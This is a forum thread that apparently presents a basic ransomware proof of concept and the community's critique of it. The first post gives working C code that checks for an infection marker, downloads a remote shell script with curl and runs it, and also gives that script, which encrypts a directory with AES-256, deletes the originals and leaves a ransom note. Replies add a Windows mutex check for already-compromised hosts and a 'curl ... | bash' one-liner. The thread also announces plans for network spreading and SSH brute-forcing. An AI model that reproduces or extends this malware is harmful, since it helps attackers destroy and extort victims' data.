Basic ransomware guide

Hey everyone. I think this is my first official thread, although I’ve been a member for a while now. I’ve been doing some programming in C lately and wanted to write a ransomware POC. However, this version is very basic. The next one will be able to spread throughout a network, and also use a dictionary attack or brute-force SSH logins. All of this is for educational purposes; don’t do anything dumb. More experienced malware coders, please take a look and critique the code; I’d appreciate it.

The first part of the malware includes a few essential libraries. Next it checks to see if the OS is macOS, Linux or Windows. If it’s Windows, the program should fail immediately. (The next version of this program will work on Windows.)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>


/* checks the OS (at compile time, via predefined macros), fails if windows */
void os_check(void){
    #ifdef _WIN32
        exit(1);
    #elif defined(__APPLE__)
        printf("macOS detected\n");
    #elif defined(__linux__)   /* the predefined macro is __linux__, not __LINUX__ */
        printf("Linux detected\n");
    #endif
}

This next section checks to see if the host has already been infected. If so, it fails automatically. Of course, this is to make sure the program doesn’t try to infect a system it’s already compromised. Next, we create a pointer called *command. Then memory is allocated for it. Afterwards we pass a string to strcpy, which copies it into command. The command is then run by the system call, system(). If there’s a better way to do this, please let me know. The commands are to download a shell script which encrypts the user’s file or directory using AES-256.

There are several other features I wanted to add; however, I need to read up on implementing them.


/* checks for the infection marker and exits if this host was already hit
 * (note: this version only checks the marker, it never writes it) */
int infected(void){
    const char *filename = "/tmp/worm.c";
    struct stat buffer;
    int exist = stat(filename, &buffer);
    if(exist == 0)
        exit(1);        /* marker present: already infected */
    else
        return 0;
}

int main(void){
    os_check();
    infected();

    char *command = malloc(60 * sizeof(char));
    if(command == NULL)
        return 1;

    /* download the script into /tmp; -O saves it to a file instead of printing it to stdout */
    strcpy(command, "cd /tmp && curl -O http://0.0.0.0:8000/encrypt.sh");
    system(command);

    /* each system() call starts a fresh shell in the original cwd, so cd again, then run it */
    strcpy(command, "cd /tmp && chmod +x encrypt.sh && ./encrypt.sh");
    system(command);

    free(command);
    return 0;
}

Shell script


#!/bin/sh
# compresses the target directory with tar, encrypts it with openssl using AES-256-CBC,
# removes the plaintext copies and drops a note
cd /tmp || exit 1                        # /tmp/test is the target; use whatever directory
tar -czf test.tar.gz test || exit 1
# -e encrypts; -d would try to decrypt the .tar.gz and fail.
# '#' only starts a comment at the beginning of a word, so the passphrase is literally "#password".
openssl enc -e -aes-256-cbc -salt -in test.tar.gz -out test.aes256 -pass pass:#password || exit 1
rm test.tar.gz
rm -r test
echo "All your files are encrypted!" > note.txt
9 Likes

It’s good that the code is straight to the point, but the preprocessor macros only work at compile time. Shameless advertising, but maybe using this trick could allow your program to run on Windows and Linux.

2 Likes

Thank you, I’ll take a look at your post, and it’s good advertising :slight_smile:

Also, using named pipes or a mutex to check the currently ransomed machine is usually how you know if the process has either completed or hasn’t even started.

...
#include <windows.h>
#include <stdio.h>

HANDLE h;
#define SUS "Global\\NotSus"

/* returns TRUE if the named mutex already exists (another instance is running),
 * FALSE if we created it (h is left open so the name stays taken while we run),
 * -1 if CreateMutex failed outright */
static int exists(void) {
    int ret = FALSE;
    if ((h = CreateMutexA(NULL, FALSE, SUS))) {
        DWORD error = GetLastError();
        if (error == ERROR_ALREADY_EXISTS) {
            CloseHandle(h);
            ret = TRUE;
        }
        if (error == ERROR_INVALID_HANDLE) {   /* name already used by a different kind of object */
            CloseHandle(h);
            fprintf(stderr, "ERROR: %s\n", "Invalid handle");
            ret = FALSE;
        }
    }
    else {
        fprintf(stderr, "ERROR: Failed with 0x%lx\n", (unsigned long)GetLastError());
        return -1;
    }
    return ret;
}
3 Likes
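For the Linux/macOS targets the first post actually builds for, the same "is another instance already here?" question that the stat("/tmp/worm.c") marker and the Windows named mutex above both answer can be handled with a lock file held by flock(2). This is an added example, not code from the thread or from either poster: it assumes an illustrative lock path under /tmp, and the function names instance_lock/instance_unlock are invented here. Unlike a marker file, the kernel drops a flock when the holding process exits, so a crash cannot leave a stale "already running" signal behind, and unlike a named mutex it needs no Windows API.

```c
/* Added example, not from the thread. A lock file held with flock(2) as the
 * POSIX counterpart of the Windows named-mutex check and an alternative to a
 * bare stat() on a marker file. Path names below are illustrative only. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/file.h>
#include <unistd.h>

/* Try to become the single running instance for `path`.
 * Returns 0 if the lock was acquired (the descriptor is kept open, which is
 * what holds the lock; it is handed back via *out_fd when out_fd is non-NULL),
 * 1 if another instance already holds it, -1 on error with errno set.
 * flock locks belong to the open file description, so a second open() of the
 * same path, even by the same process, sees the lock as taken. */
int instance_lock(const char *path, int *out_fd) {
    int fd = open(path, O_RDWR | O_CREAT, 0600);
    if (fd < 0)
        return -1;
    /* keep exec'd children (e.g. from system()) from inheriting and holding the lock */
    fcntl(fd, F_SETFD, FD_CLOEXEC);
    if (flock(fd, LOCK_EX | LOCK_NB) < 0) {
        int saved = errno;
        close(fd);
        if (saved == EWOULDBLOCK)
            return 1;                  /* held elsewhere: already running */
        errno = saved;
        return -1;
    }
    /* record the holder's pid so an operator inspecting the box can see who owns it */
    char pid[32];
    int n = snprintf(pid, sizeof pid, "%ld\n", (long)getpid());
    if (ftruncate(fd, 0) == 0 && n > 0) {
        ssize_t w = write(fd, pid, (size_t)n);
        (void)w;
    }
    if (out_fd)
        *out_fd = fd;
    return 0;
}

/* Release the lock by closing the descriptor that holds it. */
void instance_unlock(int fd) {
    if (fd >= 0)
        close(fd);
}

int main(void) {
    int fd = -1;
    int r = instance_lock("/tmp/example-instance.lock", &fd);   /* illustrative path */
    if (r == 1) {
        puts("already running, exiting");
        return 1;
    }
    if (r < 0) {
        perror("instance_lock");
        return 2;
    }
    puts("lock acquired, doing work");
    instance_unlock(fd);
    return 0;
}
```

Run it twice concurrently and the second copy reports "already running"; kill the first with SIGKILL and the lock is gone immediately, which is the property a marker file under /tmp lacks. The pid written into the file is informational only; the lock itself is the flock, not the file's contents.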

Yea this will be useful, thanks. Never even thought about this.

How is this even relevant to this posting?

1 Like

Bots, bots, bots are everywhere; ignore them.

On clang on my computer, __linux__ works; __LINUX__ does not.

1 Like

It seems that it’s just __linux__.

2 Likes

Is there any other way to check for an already infected machine?

1 Like

Can you not scroll up?

2 Likes

I feel so confident about this code by the way!

1 Like

A simpler way to avoid touching the disk and allocating: just do

system("curl http://0.0.0.0:8000/encrypt.sh | bash");

2 Likes

This topic was automatically closed after 121 days. New replies are no longer allowed.